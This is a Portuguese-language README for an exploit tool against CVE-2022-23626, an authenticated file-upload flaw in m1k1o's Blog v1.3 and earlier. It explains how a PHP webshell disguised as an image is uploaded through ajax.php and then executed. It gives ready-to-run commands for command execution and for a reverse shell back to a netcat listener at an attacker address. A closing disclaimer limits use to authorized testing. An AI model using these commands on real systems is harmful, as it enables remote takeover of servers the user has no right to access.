
Exploit de execução remota de código autenticada para o Blog v1.3 do m1k1o via upload de arquivo não validado, com implantação de webshell e capacidades de reverse shell.
Execução Remota de Código Autenticada através de vulnerabilidade de upload de arquivo no Blog do m1k1o v1.3 e anteriores.
O endpoint ajax.php?action=upload_image não valida adequadamente os tipos de arquivos enviados, permitindo que um usuário autenticado faça upload de um webshell PHP disfarçado de imagem. O atacante pode então acionar a execução solicitando diretamente o arquivo enviado.
requestspip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
Inicie um listener primeiro:
nc -lnvp 4444
Então execute:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
Esta ferramenta é destinada apenas para testes de segurança autorizados e fins educacionais. Utilize-a apenas em sistemas nos quais você tenha permissão explícita para testar.